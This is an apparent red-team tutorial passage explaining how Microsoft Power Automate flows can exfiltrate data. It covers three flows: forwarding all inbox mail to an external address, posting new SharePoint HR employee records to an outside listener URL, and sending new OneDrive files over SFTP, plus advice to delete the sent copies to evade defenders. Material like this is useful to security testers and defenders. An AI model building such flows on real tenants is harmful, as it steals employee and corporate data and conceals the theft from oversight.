Data Exfiltration

Flow has hundreds of connectors. Many of them can be used for data exfiltration. With the help of a purpose built flow, data can be exfiltrated automatically. Below are a few examples that are designed to exfiltrate data.

Keep in mind that these are just examples and they can be mixed and matched to meet what ever needs you may have.

Forward a copy of all emails

One popular way of persistent data exfiltration is to send a copy of all incoming emails to an outside email address by way of an outlook rule.

This technique is popular enough that defends are now keen to this methodology and make an active effort to check for and discover the malicious rules. Another way to accomplish this is to leverage Flow.

The flow below takes any email that arrives in the 'Inbox' and sends it to an external address of our choice.

The next step of this flow should be to delete the email from the sent folder. I'll let you figure out the best way to accomplish this.

New SharePoint File -> HTTP Post

Another way to move data out of an organization is by using the HTTP connector. The flow below leverages the SharePoint connector to act as the trigger when a file is created. The trigger is monitoring the jellypark SharePoint server, specifically the hr site.

Within the site, the trigger is monitoring the employee-records folder. Any time a new file is created the flow begins and moves into the action section.

The action for this flow is using the HTTP connector to make a POST request to an external website (hxxps://listener.somelisteningwebsite.com). The body of the post request is very important. It is JSON data which contains two dynamic variables depending on the file created in the trigger.

The value of the 'File name' variable is the name of the file created and the 'File Content' variable is filled with the contents of the file. All of this data is wrapped up into the JSON so that when it arrives at the listener website it can easily be reconstructed.

New OneDrive File -> SFTP

Much like the SharePoint trigger waiting for a new file to be created within a folder, the OneDrive trigger for new file creation works the same way. When configuring the 'When a file is created' trigger the only option required is to set the folder to monitor.

For the action portion of this flow we are going to leverage the SFTP connector to send the file to a remote server. Before we can use the connector the SFTP connection needs to be defined. This connection can be used for multiple flows. At minimum to establish the connection it needs:

• A name

• Server address

• User Name

Other options such as port, password, and private key can also be defined. The image below shows an example SFTP connection.

Upon clicking the 'Create' button Microsoft will validate the connection to make sure it works. If it fails to connect it will throw an error.

Now that the connection is valid we can finish defining the 'Create file' action. The action requires a folder path on the remote server, a file name, and file content. File name and File content can both be dynamically generated based on the output from the trigger.

Below is a fully functional flow that detects when a file is created in the root folder of the users OneDrive and then sends it to a remote server via SFTP.